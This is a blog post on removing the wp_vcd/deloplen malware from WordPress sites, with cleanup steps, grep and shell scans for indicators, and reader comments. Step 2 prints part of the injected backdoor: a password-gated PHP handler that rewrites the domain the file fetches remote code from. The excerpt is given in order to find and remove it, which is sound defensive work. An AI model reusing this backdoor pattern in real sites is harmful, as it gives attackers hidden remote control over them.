How to Remove WordPress Malware src=”//deloplen.com/apu.php?

Here is the fix for the malware deloplen/pushqwer on your WordPress:

1. Remove all unused WordPress themes, because they are already infected

2. In your active theme, edit your functions.php file and delete all the extra code inserted by the malware

  • Location: \wp-content\themes\your-theme-name
  • Usually it is at the top of your code
  • You can search for the strings “wp_vcd” or “wp-tmp” to find the code.

It will be something like this:

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '220c580cc80d7d449f04533fc8f68c79'))
    {
        $div_code_name = "wp_vcd";
        switch ($_REQUEST['action'])
        {
            case 'change_domain';
                if (isset($_REQUEST['newdomain']))
                {
                    if (!empty($_REQUEST['newdomain']))
                    {
                        if ($file = @file_get_contents(__FILE__))
                        {
                            if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i', $file, $matcholddomain))
                            {
                                $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
                break;
            default:

3. Remove malware code in your post.php as well

Location: \wp-includes\

4. Remove these files:

Location: \wp-includes\
wp-feed.php
wp-vcd.php
wp-tmp.php

5. Log in to your web hosting terminal and do a final check for any files you forgot to remove:

grep -rl 'deloplen' .
grep -Ril 'pushqwer' .

6. Clear your cache if you are using any caching plugins in your WordPress

7. Final Virus Scan

You can use these few websites to do a free virus scan:

Helpful Links:
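The manual checks in steps 2 to 5 can be collected into one sweep. This is an added example, not code from the original post; the function name scan_wp_vcd, the file name scan.sh and the extra marker strings wp-vcd and wp-feed (taken from the file names in step 4) are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): one sweep for the indicators
# named in steps 2-5. Prints each hit; returns 1 if anything was found.
scan_wp_vcd() {
    root=${1:-.}
    found=0
    # Assumption: injected code refers to the dropped files by name.
    markers='wp_vcd|wp-vcd|wp-tmp|wp-feed'

    # Step 4: files the post says to delete from wp-includes.
    for name in wp-feed.php wp-vcd.php wp-tmp.php; do
        if [ -e "$root/wp-includes/$name" ]; then
            echo "DROPPED-FILE  $root/wp-includes/$name"
            found=1
        fi
    done

    # Steps 1-3: every theme's functions.php (unused themes too) and post.php.
    for f in "$root"/wp-content/themes/*/functions.php "$root/wp-includes/post.php"; do
        [ -f "$f" ] || continue
        lines=$(grep -nE "$markers" "$f" | cut -d: -f1 | tr '\n' ' ' || true)
        if [ -n "$lines" ]; then
            echo "INJECTED-CODE $f (lines: $lines)"
            found=1
        fi
    done

    # Step 5: anything else mentioning the two strings, dotfiles included.
    leftovers=$(grep -rIliE 'deloplen|pushqwer' "$root" 2>/dev/null || true)
    if [ -n "$leftovers" ]; then
        echo "$leftovers" | sed 's/^/REFERENCE     /'
        found=1
    fi
    return "$found"
}

# Run directly as: sh scan.sh /path/to/wordpress
if [ "$#" -gt 0 ]; then
    scan_wp_vcd "$1"
fi
```

A non-zero exit status means at least one indicator is still present, so the script can be rerun after each cleanup pass until it reports nothing.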

15 thoughts on “How to Remove WordPress Malware src=”//deloplen.com/apu.php?”

    • For the theme removal part, did you keep one active theme?
      If you remove them all, better contact your web hosting to get a copy of your previous website to recover first.

      Reply
  1. What malware scanner picked it up for you? Google keeps telling me I still have this on my WordPress site, but I can’t find it anywhere and no scans pick it up. I’m starting to think they’re using old versions of my files, since I did clean the offending scripts out a week or so ago (or so I thought).

    Reply
  2. Many thanks. Those fixes worked perfectly.

    How to plug the vulnerability that allowed them to infect the sites with this hack?

    I already run modsecurity 3.0 on my VPS server, which is very secure, and use IT Themes Security Pro plugin, yet they still got in.

    Any suggestions on how to stop this happening again would be welcome.

    Reply
    • Unfortunately I don’t have a better way of preventing it… But I think you already have some good monitoring systems installed 🙂

      Reply
  3. Can you please help me with what to remove from the above code?

    On my website I can see the same code; if I delete that code, it shows that synopsis error.

    Can you please tell me what to remove and how to close the program?

    Reply
